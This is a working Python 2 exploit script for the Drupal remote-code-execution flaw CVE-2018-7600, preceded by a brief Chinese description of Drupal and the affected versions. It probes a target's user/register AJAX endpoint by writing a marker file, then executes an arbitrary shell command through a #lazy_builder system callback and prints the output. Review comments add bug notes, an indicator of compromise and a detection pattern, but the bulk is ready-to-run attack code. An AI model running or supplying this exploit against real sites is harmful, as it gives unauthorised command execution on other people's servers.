Drupal 是一款开源的内容管理系统，使用 PHP 语言编写，在业界广泛使用。
影响版本：Drupal 6.x、7.x、8.x

  • exploit
#!/usr/bin/env
import sys
import requests

# print ('################################################################')
# print ('# Proof-Of-Concept for CVE-2018-7600')
# print ('# by Vitalii Rudnykh')
# print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
# print ('# https://github.com/a2u/CVE-2018-7600')
# print ('################################################################')
# print ('Provided only for educational or information purposes\n')

# target = input('Enter target url (example: https://domain.ltd/): ')

def check():
    # Probe the configured `target` (a module-level global set in __main__)
    # for CVE-2018-7600 by POSTing a crafted render-array field to the
    # user_register AJAX endpoint, then fetching the file the probe is
    # expected to have created. On success it hands off to main().
    #
    # NOTE(review): the proxy is hard-coded to a single address and is set
    # for the "http" scheme only, so an https target would not be proxied.
    proxies = {"http": "http://192.11.22.13:1080"}
    # The probe asks the server to write the marker string "ok11ok" into
    # hello1.txt. If the target is vulnerable this leaves a persistent file in
    # the site's web root that the script never removes -- for defenders, an
    # unexpected hello1.txt containing "ok11ok" is an indicator that this PoC
    # was run against the host.
    payload_check = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "ok11ok" | tee hello1.txt'}
    # Detection note: the query string below (element_parents=account/mail/%23value
    # with ajax_form=1 and _wrapper_format=drupal_ajax) together with a form
    # field name containing "#post_render" or "#lazy_builder" is the request
    # pattern to alert on at the WAF / web-server log level.
    target_url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
    # The response to the probe itself is not inspected; the variable is unused.
    payload_check_html = requests.post(target_url, proxies=proxies, data=payload_check)

    url  = target+"hello1.txt"
    #print url
    html = requests.get(url,proxies=proxies)
    #print html.content
    # Python 2 semantics (print statements below): `html.content` is a str.
    # Under Python 3 `.content` is bytes and `"ok11ok" in html.content` raises
    # TypeError, so the script reports nothing rather than "Not Vulnerability!".
    if (html.status_code == 200) and ("ok11ok" in html.content):
        print "Vulnerability!"
        # Immediately runs the command given on the command line.
        main()
    else:
        print "Not Vulnerability!"



def main():
    # Send `cmd` (module-level global from __main__) to `target` as the
    # argument of a `system` #lazy_builder callback via the same AJAX
    # endpoint used by check(), and print the response body. Called only
    # from check() after the probe succeeds; there is no return value.
    #
    # Mitigation: Drupal core releases that fix CVE-2018-7600 sanitise
    # "#"-prefixed keys in request input, which is what makes this request
    # pattern inert on a patched site.
    #
    # Add proxy support (eg. BURP to analyze HTTP(s) traffic)
    # set verify = False if your proxy certificate is self signed
    # remember to set proxies both for http and https
    #
    # example:
    # proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
    # verify = False
    # NOTE(review): same fixed, http-only proxy as in check(); the example
    # above with both schemes is what the comment recommends but is not used.
    proxies = {"http": "http://192.11.22.13:1080"}

    url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
    # `cmd` is interpolated verbatim; no quoting or validation is applied.
    payload_exp = {'form_id': 'user_register_form',
               '_drupal_ajax': '1',
               'mail[a][#lazy_builder][0]': 'system',
               'mail[a][#lazy_builder][1][]': '%s'%cmd}
    # The last 75 bytes of the body are dropped -- presumably the trailing
    # part of Drupal's AJAX JSON wrapper around the output; TODO confirm,
    # as a different wrapper length would truncate or leak wrapper text.
    payload_exp_html = requests.post(url, proxies=proxies, data=payload_exp).content[:-75]
    print payload_exp_html

if __name__ == '__main__':
    # CLI entry point: exploit.py <ip:port|url> "<cmd>". Defines the
    # module-level globals `target` and `cmd` that check() and main() read,
    # then starts with the vulnerability probe.
    if len(sys.argv) < 3:
        print 'Usage: python exploit.py ip:port  "cmd"'
        sys.exit(1)
    else:
        target =  sys.argv[1]
        #fun = sys.argv[2]
        cmd = sys.argv[2]
        # Only an "http://" prefix is recognised: an "https://..." argument
        # does not match and ends up as "http://https://...".
        if not target.startswith("http://"):
            target = "http://" +target
        # A trailing slash is required because check()/main() append
        # relative paths directly to `target`.
        if not target.endswith("/"):
            target = target +  "/"
        # check() calls main() itself when the probe succeeds.
        check()
